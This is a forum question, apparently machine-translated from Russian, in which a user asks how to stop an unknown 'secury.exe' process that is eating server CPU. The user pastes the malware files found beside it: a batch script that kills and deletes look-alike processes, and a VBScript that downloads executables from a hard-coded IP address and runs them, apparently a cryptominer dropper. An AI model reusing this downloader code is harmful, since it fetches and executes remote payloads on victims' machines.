у меня есть следующая ситуация в моем диспетчере задач:
Я не знаю, что это за приложение, но определенно не Steam client bootstrapper, потому что я его не устанавливал, а также не могу его удалить.
если я пытаюсь выяснить, что это за приложение через этот шаг:
Я вижу что-то вроде это:
в утилите MS Config я не нашел ничего похожего на secury.exe
.
когда я открываю расположение файла, я вижу три файла:
m.bat
,b.exe
,4.vbs
.
ниже идет содержание m.bat
:
taskkill /f /t /im secury.exe
c:ProgramDatasecury.exe
taskkill /f /t /im kingsoft.exe
taskkill /f /t /im expl0rer.exe
taskkill /f /t /im ieplare.exev
taskkill /f /t /im nssm.exe
taskkill /f /t /im MSASCui.exe
taskkill /f /t /im SystemSettlngs.exe
taskkill /f /t /im SystemSetting.exe
taskkill /f /t /im Process.exe
taskkill /f /t /im winlnlt.exe
taskkill /f /t /im WindowsUpgrade.exe
taskkill /f /t /im msdc.exe
taskkill /f /t /im Fiddlere.exe
taskkill /f /t /im shovst.exe
taskkill /f /t /im lqrtqe.exe
taskkill /f /t /im apkls.exe
taskkill /f /t /im winlog.exe
taskkill /f /t /im svchosts.exe
taskkill /f /t /im win1ogins.exe
taskkill /f /t /im shovsts.exe
taskkill /f /t /im fcty.exe
taskkill /f /t /im soiuos.exe
taskkill /f /t /im TrustedInstaller.exe
del C:WindowsSystem32soiuos.exe
del C:WindowsSetupTrustedInstaller.exe
del C:ProgramDatakingsoft.exe
del C:ProgramDataexpl0rer.exe
del C:ProgramDataieplare.exe
del C:ProgramDatanssm.exe
del C:ProgramDataMSASCui.exe
del C:ProgramDataSystemSettlngs.exe
del C:ProgramDataSystemSetting.exe
del C:ProgramDataProcess.exe
del C:ProgramDatawinlnlt.exe
del C:ProgramDataWindowsUpgrade.exe
del C:ProgramDatamsdc.exe
del C:ProgramDataFiddlere.exe
del C:ProgramDatashovst.exe
del C:ProgramDatalqrtqe.exe
del C:ProgramDataapkls.exe
del C:ProgramDatawinlog.exe
del C:ProgramDatasvchosts.exe
del C:ProgramDatawin1ogins.exe
del C:ProgramDatashovsts.exe
del C:ProgramDatafcty.exe
del C:ProgramDatapool.exe
del C:ProgramDatapool2.exe
del C:ProgramDatapool3.exe
Далее идет 4.vbs
:
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/2.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:ProgramDatas2.exe",2
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:ProgramDatapool2.exe",2
CreateObject("WScript.Shell").Run "C:ProgramDatapool3.exe"
CreateObject("WScript.Shell").Run "del C:ProgramDatapool3.exe"
что я могу сделать, чтобы остановить secury.exe
от злоупотребления вычислительными мощностями моего сервера?
P. S. Я был казнен Аваст полную проверку моего компьютера, но ничего не нашел.